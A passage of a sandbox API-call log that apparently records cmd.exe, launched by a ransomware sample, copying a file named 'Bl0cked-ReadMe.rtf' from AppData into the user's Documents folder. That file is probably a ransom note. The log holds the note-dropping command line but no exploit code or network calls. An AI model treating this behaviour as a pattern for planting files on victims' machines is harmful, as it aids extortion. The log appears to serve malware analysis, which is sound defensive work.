ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee99c | out: phkResult=0x2ee99c*=0x40) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x0, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegCloseKey (hKey=0x40) returned 0x0 [0236.985] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c4 [0236.985] srand (_Seed=0x5b8863c4) [0236.985] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0236.985] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0236.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.986] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.986] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.986] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.986] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.987] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.987] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.987] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.987] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.987] GetEnvironmentStringsW () returned 0x3e22b8* [0236.987] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0236.987] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.987] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.987] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.987] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.987] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.987] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.987] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef768, lpFilePart=0x2ef764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef764*="Desktop") returned 0x18 [0236.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.987] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.987] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.988] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.988] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.988] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.988] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.988] GetEnvironmentStringsW () returned 0x3e2ad8* [0236.988] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0236.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.989] GetConsoleOutputCP () returned 0x1b5 [0236.989] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.989] GetUserDefaultLCID () returned 0x409 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="1") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0236.990] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.990] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.991] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.991] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.991] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.991] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.991] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.991] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.991] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.991] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] GetFileType (hFile=0x7) returned 0x2 [0236.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0236.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef7a0 | out: lpMode=0x2ef7a0) returned 1 [0236.995] _dup (_FileHandle=1) returned 3 [0236.995] _close (_FileHandle=1) returned 0 [0236.996] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0236.996] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef770, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0236.997] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0236.997] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.997] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0236.997] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0236.997] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0236.997] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0236.997] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.998] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef104) returned 0x3d0e50 [0236.998] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0236.998] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0236.998] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0236.998] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee010, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0236.998] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] GetFileType (hFile=0x54) returned 0x1 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee068 | out: lpFileSizeHigh=0x2ee068*=0x0) returned 0x1632 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] GetFileType (hFile=0x4c) returned 0x1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] GetFileType (hFile=0x4c) returned 0x1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.001] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.001] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.002] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.002] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.003] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.003] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, 